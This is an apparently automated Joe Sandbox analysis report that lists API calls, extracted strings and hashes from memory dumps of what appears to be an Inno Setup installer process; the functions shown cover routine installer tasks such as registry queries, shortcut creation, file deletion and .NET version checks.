                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2000705611-3672972446
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4a318e87720889a097493a0abe27b1df8a88164eaf2040f35688be5a9dc9248a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d71e95358f961f9c8085103628ed7ebfe7aaf39cab9d6a0a027eda6f41515cae
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a318e87720889a097493a0abe27b1df8a88164eaf2040f35688be5a9dc9248a
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C291B530A042449FDF11EBA9DC52BAE7FA4EF4A304F51447BF500AB292DA7DAC05CB59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,0045ACF8,?,?,?,?,?,00000006,?,00000000,0049722D,?,00000000,004972D0), ref: 0045ABAA
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-3112430753
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8dd09e15f559fd6f0d67e26a119f6220e90e0bd9f89cbcf696879c9df5090d41
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f5e388fb48f96f1c0466849e1c52bdf0d536658550fb6e74c3a20cf80cd44526
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dd09e15f559fd6f0d67e26a119f6220e90e0bd9f89cbcf696879c9df5090d41
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2271AE707002445BDB01EB69D8427AE77A6AF48316F50856BFC01DB383CA7C9A5DC79A
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetVersion.KERNEL32 ref: 0045CF3E
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CF5E
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CF6B
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CF78
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CF86
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0045CE2C: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CECB,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CEA5
                                                                                                                                                                                                                                                                                                                                                                  • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D03F
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045D179,?,?,00000000), ref: 0045D048
                                                                                                                                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                                                                                                                                                                                                                                                                                                  • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 59345061-4263478283
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2037b2949033d7132acb2327bd8fd217b085bf91818b95555bc32f42a47d3e2f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4ce31bb81caf279f5ed3d10c62bb09a2aad5f6c7ba3f26a8019cd68bbbdcec0a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2037b2949033d7132acb2327bd8fd217b085bf91818b95555bc32f42a47d3e2f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E95193B1D00608EFDB10DFA9C845BAEBBB8EF48315F14806AF915B7381C2389945CF69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 7715E550.OLE32(00499A74,00000000,00000001,00499774,?,00000000,0045688D), ref: 00456592
                                                                                                                                                                                                                                                                                                                                                                  • 7715E550.OLE32(00499764,00000000,00000001,00499774,?,00000000,0045688D), ref: 004565B8
                                                                                                                                                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00456745
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • IPersistFile::Save, xrefs: 00456814
                                                                                                                                                                                                                                                                                                                                                                  • CoCreateInstance, xrefs: 004565C3
                                                                                                                                                                                                                                                                                                                                                                  • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 004567B6
                                                                                                                                                                                                                                                                                                                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004566DB
                                                                                                                                                                                                                                                                                                                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 0045677C
                                                                                                                                                                                                                                                                                                                                                                  • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004566A7
                                                                                                                                                                                                                                                                                                                                                                  • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 0045672A
                                                                                                                                                                                                                                                                                                                                                                  • IPropertyStore::Commit, xrefs: 00456795
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: 7715E550$FreeString
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3367576848-3936712486
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e040367b628a04ae645fd749e40d1cfb51c1ea3973fe98a4ae999b6810968a58
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c99fdec92309fd26656a6f7ea9bd91ecf5cc306c054acb75a5569a06f28a4b2e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e040367b628a04ae645fd749e40d1cfb51c1ea3973fe98a4ae999b6810968a58
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29A13E71A00104AFDB50EFA9C885B9E7BF8EF09706F55406AF804E7252DB38DD48CB69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4C40.GDI32(00000000,?,00000000,?), ref: 0041B3D3
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4C40.GDI32(00000000,00000000,?,00000000,?), ref: 0041B3DD
                                                                                                                                                                                                                                                                                                                                                                  • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B3EF
                                                                                                                                                                                                                                                                                                                                                                  • 73EA6180.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B406
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B412
                                                                                                                                                                                                                                                                                                                                                                  • 73EA4C00.GDI32(00000000,0000000B,?,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B43F
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(00000000,00000000,0041B472,00000000,0041B46B,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B465
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                                                                                                                                                                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                                                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                                                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Object$Select$Delete$A480A570A6180Stretch
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1888863034-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042C814: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C838
                                                                                                                                                                                                                                                                                                                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00472F70
                                                                                                                                                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00473077
                                                                                                                                                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 0047308D
                                                                                                                                                                                                                                                                                                                                                                  • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 004730B2
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 971782779-3668018701
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1ded2309c22d90a9957aabde76cedeacc99048359e90752decbb9b8a0015ab1b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d90696b7f394c24cdb4db4d6ef42549a737ff1f83f29ed15b4b10dbb48a3fc8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FD12574A00149AFDB01EFA9D581BDDBBF5AF08305F50806AF804B7392D778AE45CB69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,?,00000000,?,00000000,00454AF9,?,0045AECE,00000003,00000000,00000000,00454B30), ref: 00454979
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 004549FD
                                                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(0045AECE,00000000,00000000,00000000,?,00000004,00000000,00454A43,?,0045AECE,00000000,00000000,?,00000000,?,00000000), ref: 00454A2C
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454897
                                                                                                                                                                                                                                                                                                                                                                  • , xrefs: 004548EA
                                                                                                                                                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 004548D0
                                                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyEx, xrefs: 004548FC
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: QueryValue$FormatMessageOpen
                                                                                                                                                                                                                                                                                                                                                                  • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2812809588-1577016196
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4f643a2b0558928eb78c870f76fd7b9269d180bdad5757f866f38432355ac2b8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 44bd6ba1492406805f437c97fe518088f2f8e7c1bef0b67c8a01139b77ca8c69
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f643a2b0558928eb78c870f76fd7b9269d180bdad5757f866f38432355ac2b8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0911471944248ABDB10DFE5D942BDEB7FCEB48309F50406BF900FB282D6789E458B69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004596C8: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00459805,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459715
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459863
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 004598CD
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,004599BD,?,00000000,00000000,00000000), ref: 00459934
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00459816
                                                                                                                                                                                                                                                                                                                                                                  • v4.0.30319, xrefs: 00459855
                                                                                                                                                                                                                                                                                                                                                                  • v1.1.4322, xrefs: 00459926
                                                                                                                                                                                                                                                                                                                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 004598E7
                                                                                                                                                                                                                                                                                                                                                                  • .NET Framework version %s not found, xrefs: 0045996D
                                                                                                                                                                                                                                                                                                                                                                  • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00459880
                                                                                                                                                                                                                                                                                                                                                                  • .NET Framework not found, xrefs: 00459981
                                                                                                                                                                                                                                                                                                                                                                  • v2.0.50727, xrefs: 004598BF
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Close$Open
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2976201327-446240816
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00458DDF
                                                                                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00458DFB
                                                                                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00458E09
                                                                                                                                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?), ref: 00458E1A
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E61
                                                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458E7D
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Helper process exited with failure code: 0x%x, xrefs: 00458E47
                                                                                                                                                                                                                                                                                                                                                                  • Helper isn't responding; killing it., xrefs: 00458DEB
                                                                                                                                                                                                                                                                                                                                                                  • Helper process exited., xrefs: 00458E29
                                                                                                                                                                                                                                                                                                                                                                  • Stopping 64-bit helper process. (PID: %u), xrefs: 00458DD1
                                                                                                                                                                                                                                                                                                                                                                  • Helper process exited, but failed to get exit code., xrefs: 00458E53
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3355656108-1243109208
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DDF4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
